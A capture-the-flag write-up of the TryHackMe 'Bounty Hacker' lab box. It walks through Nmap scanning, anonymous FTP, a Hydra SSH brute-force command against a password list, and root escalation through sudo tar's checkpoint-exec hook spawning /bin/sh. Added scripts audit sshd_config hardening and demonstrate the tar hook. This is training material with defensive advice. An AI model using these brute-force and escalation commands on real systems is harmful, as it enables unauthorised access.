TryHackMe - Bounty Hacker

Software Sinner
May 7, 2021

This is my 17th write-up, and I will be discussing my experience with the machine “Bounty Hacker” from TryHackMe. TryHackMe is a great platform for people who are starting out in the InfoSec field and want to sharpen their skills in networking, Linux, hacking, etc. The platform is very hands-on with its training material and keeps it fun for learners. This challenge was super cool not only because it is one of my favorite animes but because the way it was set up made it a great experience. For those of you wondering, the box is based on the show Cowboy Bebop, an anime classic. In short: FTP allowed anonymous access and served up a password list, that list was used to brute-force a user's SSH login, and that user was allowed to run tar as root via sudo.

Ed is up to something here..

Step 1: Enumeration

I started off with an Nmap scan against this machine to see what ports/versions were exposed and decided there was no need for a second scan type. It does not hurt to run two different types of Nmap scans, because one scan may provide more results than the other depending on the flags used, plus it's just good hygiene. The scan I kicked off used the default scripts (-sC) and version detection (-sV) flags. Note that without -p- this only covers Nmap's top 1,000 TCP ports (the 967 filtered + 30 closed + 3 open in the output below), so a full-range scan is worth queuing in the background while you work. If it is your first time learning about Nmap, I would check out HackerSploit's YouTube tutorials.

sinner@kali:~/Documents/tryhackme/bountyhacker$ nmap -sC -sV  10.10.27.252
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 22:00 EDT
Nmap scan report for 10.10.27.252
Host is up (0.21s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.2.79.120
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.79 seconds

Reading the results, I usually start from top to bottom, but port 80 always screams at me to visit it first. I was welcomed with the Cowboy Bebop crew :)

I ran directory-busting tools and did not find anything of interest, so I moved on to the next port on my list, which was port 21 (FTP). From the Nmap scan results you can see it allows anonymous logins (the ftp-anon script reported FTP code 230) 😮. I opened my terminal, ran the ftp command followed by the machine's IP, entered the username “anonymous” and just hit enter at the password prompt.

Running the dir command showed two interesting files, and I pulled them down to my machine to view their contents, since the ftp client does not let you read a file without downloading it first.

mget * grabs every file in the current directory

I ran around in circles at first because when I tried to grab these files it gave me a “permission denied”. I learned that running the “ftp” command as root will fix this. (Worth knowing why that worked: running the client as root cannot change what the FTP server permits, so the denial was coming from the local side, i.e. the ftp client could not write the downloads into my current directory. Changing into a writable directory is the less drastic fix; running network clients as root is not something to make a habit of.) Upon viewing the files on my machine I opened task.txt first and noticed an interesting note written by lin, hmm..

The next file, locks.txt, had a whole list of passwords; these were definitely not in username format. This led me to a possible brute force against the only open service left, which was SSH on port 22. There were no other login pages or services presented, so this seemed to be my only option. We needed some usernames to try, so I compiled a list based on the Cowboy Bebop web page, using the crew's names plus lin from the note we saw. I fired up Hydra for the SSH brute-force attack with the following command (-L/-P take the username and password lists, -t 4 keeps the parallel connections low enough that sshd does not start dropping attempts):

sudo hydra -vV -L bebop_users.txt -P locks.txt 10.10.27.252 -t 4 ssh

Sure enough, we got a hit, ladies and gentlemen..

Now I was able to connect to the user's account via SSH with that password. You should never allow password authentication over SSH if you can avoid it (use keys instead), and if you must, at least pair it with a lockout or rate-limiting policy (fail2ban, for example) to blunt brute-force attacks like this one.
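To make the hardening point concrete, here is an added example (not part of the original write-up) that audits an sshd_config for the settings that let the hydra run above succeed. The two config files are constructed samples: one with the password-friendly defaults you find on lab boxes, one hardened to keys only. The audit reads the first non-comment occurrence of each directive, which is how sshd resolves global settings, and falls back to OpenSSH's documented defaults when a directive is absent; it deliberately ignores Match blocks.

```shell
#!/usr/bin/env bash
# Audit an sshd_config for the weak settings behind the SSH brute force above.
# Added example, not from the write-up. The sample configs below are constructed.
set -eu

# effective_value FILE KEY: print the first non-comment value of KEY (case-insensitive,
# lowercased), or OpenSSH's default when the key is absent. sshd honours the first
# occurrence of a directive; Match blocks are ignored here for simplicity.
effective_value() {
    local file=$1 key=$2 lk val
    lk=$(printf '%s' "$key" | tr 'A-Z' 'a-z')
    val=$(awk -v k="$lk" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        { if (tolower($1) == k) { print tolower($2); exit } }' "$file")
    if [ -z "$val" ]; then
        case "$lk" in
            passwordauthentication) val=yes ;;               # default: passwords allowed
            permitrootlogin)        val=prohibit-password ;;  # default since OpenSSH 7.0
            maxauthtries)           val=6 ;;                 # default: 6 guesses per connection
            pubkeyauthentication)   val=yes ;;
        esac
    fi
    printf '%s\n' "$val"
}

# audit_sshd FILE: print one finding per weak setting; return 1 if any were found.
audit_sshd() {
    local file=$1 findings=0
    if [ "$(effective_value "$file" PasswordAuthentication)" = yes ]; then
        echo "WEAK: PasswordAuthentication yes (wordlist attacks like the hydra run work)"
        findings=$((findings + 1))
    fi
    if [ "$(effective_value "$file" PermitRootLogin)" = yes ]; then
        echo "WEAK: PermitRootLogin yes (root is a guessable username too)"
        findings=$((findings + 1))
    fi
    if [ "$(effective_value "$file" MaxAuthTries)" -gt 3 ]; then
        echo "WEAK: MaxAuthTries > 3 (more guesses per connection before disconnect)"
        findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}

# Constructed sample 1: the kind of defaults that let the brute force succeed.
WEAK_CFG=$(mktemp)
cat > "$WEAK_CFG" <<'EOF'
# Lab-box defaults
Port 22
PasswordAuthentication yes
PermitRootLogin yes
EOF

# Constructed sample 2: keys only, root login off, fewer guesses per connection.
HARDENED_CFG=$(mktemp)
cat > "$HARDENED_CFG" <<'EOF'
Port 22
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
MaxAuthTries 3
# Pair with fail2ban (or equivalent) so repeated failures lock the source out.
EOF

audit_sshd "$WEAK_CFG" || echo "-> weak config needs hardening"
audit_sshd "$HARDENED_CFG" && echo "-> hardened config passes"
```

Run it against a real host with `audit_sshd /etc/ssh/sshd_config` after `sshd -T` confirms the effective values; remember that disabling passwords only helps once every account that needs access actually has a key installed.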

The first thing I do with a low-privilege account is run sudo -l, and sure enough it showed that I could run the tar command as root. Another mistake I made was thinking that I needed the root password to run sudo -l, but I was wrong: sudo asks for the invoking user's own password, so lin's password was all I needed. This drove me crazy for a while.. I did some googling on how to escalate privileges using the tar command and found the following:

sudo -l output
command to escalate with tar
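The mechanism behind the tar escalation is GNU tar's checkpoint hook: --checkpoint-action=exec=CMD makes tar run CMD (through /bin/sh -c) each time a checkpoint fires, so the command inherits whatever privileges tar itself has. Below is an added example, not the write-up's own command, that exercises the hook unprivileged so you can see it execute; the throwaway archive directory and the choice of `id -un` as the payload are mine.

```shell
#!/usr/bin/env bash
# Demonstrate GNU tar's --checkpoint-action=exec hook, the primitive behind "sudo tar".
# Added example, not from the write-up. Runs unprivileged; the temp dir is constructed.
set -eu

# is_gnu_tar: the checkpoint options are GNU-specific (busybox and BSD tar lack them).
is_gnu_tar() { tar --version 2>/dev/null | grep -q 'GNU tar'; }

# run_via_tar_checkpoint CMD: archive a throwaway file to /dev/null and have tar run CMD
# at the first checkpoint. CMD's stdout passes straight through. With "sudo" in front of
# tar on the target, the very same hook runs CMD as root.
run_via_tar_checkpoint() {
    local cmd=$1 work
    work=$(mktemp -d)
    : > "$work/dummy"
    # --checkpoint=1 fires after the first record written; the action is the payload.
    tar -cf /dev/null -C "$work" dummy --checkpoint=1 --checkpoint-action=exec="$cmd"
    rm -rf "$work"
}

# whoami_via_tar: the first thing to check on a box where sudo -l lists tar:
# does the hook execute, and as which user?
whoami_via_tar() { run_via_tar_checkpoint 'id -un'; }

if is_gnu_tar; then
    echo "tar ran the checkpoint command as: $(whoami_via_tar)"
    # On the target the escalation is the same idea with a shell as the payload:
    #   sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
    # Fix: remove tar from sudoers, or pin the entry to a fixed command line with no
    # user-controlled arguments; sudo's NOEXEC tag also stops tar from spawning the shell
    # (for dynamically linked binaries, which distro tar packages are).
else
    echo "non-GNU tar: --checkpoint-action is not available" >&2
fi
```

Two caveats for real engagements: the hook needs GNU tar (check with `tar --version`), and sudo rules that look restrictive ("(root) /bin/tar") are still exploitable as long as you control the arguments, which is why GTFOBins-style binaries should be removed from sudoers rather than argument-restricted by hand.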

Root is mine!
